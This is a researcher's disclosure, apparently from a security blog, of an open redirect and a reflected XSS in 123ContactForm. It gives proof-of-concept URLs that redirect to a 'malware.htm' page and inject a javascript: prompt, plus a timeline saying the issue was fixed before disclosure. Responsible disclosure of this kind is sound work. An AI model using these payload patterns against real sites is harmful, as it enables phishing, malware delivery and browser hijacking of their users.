WS201516 - Open Redirect and Reflected XSS on 123ContactForm
by David Sopas @dsopas
www.websegura.net
Description:
123ContactForm is a service developed by a young enthusiastic team located in Timisoara, Romania, EU. Founded in 2008, 123ContactForm has become a worldwide top class online form and survey builder.
When visiting a client of 123contactform.com I noticed a strange request from their site.
What I found was a Open Redirect and XSS vulnerability that could be used by malicious users to forward victims to malicious sites, spread malware, phishing accounts and even hijack victims browsers.
Proof-of-concept:
Open Redirect
http://www.123contactform.com/jsform_intermediate.html?url=http://www.websegura.net/malware.htm&xdm_e=http%3A%2F%2Fwww.
cliente_123contactform.net&xdm_c=default6100&xdm_p=1XSS
http://www.123contactform.com/jsform_intermediate.html?url=javascript:prompt(document.domain)&xdm_e=http%3A%2F%2Fwww.
cliente_123contactform.net&xdm_c=default6100&xdm_p=1
123ContactForm fixed this issue and put my name on their security acknowledgements list.
Timeline:
08 May 2015 - Sent the security issue to 123ContactForm
23 May 2015 - Reply from 123ContactForm telling that they are fixing it
26 Jun 2015 - 123ContactForm applied a fix
21 Jul 2015 - My name is added on their security acknowledgements list
22 Jul 2015 - Full disclosure
Nuno Silva: Boa tarde. Eu recebi esta proposta? Alguem me sabe esclarecer de algum...
Pedro: Fui mais uma vítima do Carlos Refachinho. Inocentemente confiei na con...
Lais Borges: Recebi um e-mail de um interessado na minha câmera e achei estranho, p...
Antonio: Mais um burlão, Carlos Alberto Cardoso Saramago com o contacto 9685192...
Antonio Carlos de Melo: Recebi tambm...tirei passaporte...pediram dinheiro para pagar moradia ...
